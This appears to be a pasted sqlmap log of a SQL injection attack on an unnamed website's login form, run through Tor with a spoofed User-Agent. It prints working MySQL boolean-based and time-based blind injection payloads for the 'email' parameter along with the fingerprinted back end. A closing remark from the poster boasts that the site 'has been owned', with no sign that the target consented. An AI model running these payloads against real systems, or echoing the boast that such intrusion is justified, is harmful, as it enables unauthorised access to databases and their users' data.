___
__H__
___ ___[)]_____ ___ ___ {1.3.10#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- starting @ 18:19:33 /2019-10-20/ [18:19:33]
[18:19:33] [INFO] setting Tor SOCKS proxy settings
[18:19:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
POST parameter 'csrf_test_name' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [yCookie parameter 'csrf_cookie_name' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests[18:19:35] [INFO] resuming back-end DBMS 'mysql'
[18:19:35] [INFO] testing connection to the target URL
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[18:19:56] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: csrf_test_name=2936a17a523389d38520607a055a419b&email=admin') RLIKE (SELECT (CASE WHEN (3068=3068) THEN 0x61646d696e ELSE 0x28 END))-- vxxs&password=password123
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: csrf_test_name=2936a17a523389d38520607a055a419b&email=admin') AND (SELECT 4790 FROM (SELECT(SLEEP(10)))QJYq)-- aeLR&password=password123
---
[18:19:56] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed
back-end DBMS: MySQL >= 5.0.12
Their garbage website is vulnerable anyway, they've been owned. And it's obvious to anyone with half a brain the website is a pure scam.